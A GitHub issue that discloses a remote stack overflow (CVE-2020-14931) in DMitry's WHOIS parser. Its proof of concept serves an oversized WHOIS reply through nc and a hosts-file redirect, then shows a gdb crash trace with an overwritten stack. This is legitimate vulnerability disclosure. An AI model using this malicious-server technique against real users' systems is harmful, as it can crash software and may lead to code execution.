search

jaygreig86 / dmitry

DMitry (Deepmagic Information Gathering Tool)
http://www.mor-pah.net
GNU General Public License v2.0
204 stars 44 forks source link

Remote Stack Overflow (possible RCE) #4

Closed carter-yagemann closed 4 years ago

carter-yagemann commented 4 years ago

Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP.

This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code.

PoC:

For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local /etc/hosts:

127.0.0.1       Af.whois-servers.net

Next, I use nc to act as the WHOIS server:

echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43

While that's running, let's see what happens in DMitry:

$ gdb ./dmitry 
[...]
(gdb) r -w EAf
Starting program: [...]/dmitry -w EAf
Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for EAf
Continuing with limited modules
HostIP:
HostName:EAf

Gathered Inic-whois information for EAf
---------------------------------
Domain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�---------------------------------
�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU

Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
141     if ( strlen(frmtdbuff) ) linetodo = 1;
(gdb) bt
#0  0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
#1  0x4141555555557dfc in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x41417fffffffe240 in ?? ()
#4  0x4e206e69616d6f44 in ?? ()
#5  0x6f6f66203a656d61 in ?? ()
#6  0x206e69616d6f440a in ?? ()
#7  0x203a737574617453 in ?? ()
#8  0x414141410a726162 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
[...]

Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.

carter-yagemann commented 4 years ago

This vulnerability has been assigned CVE-2020-14931.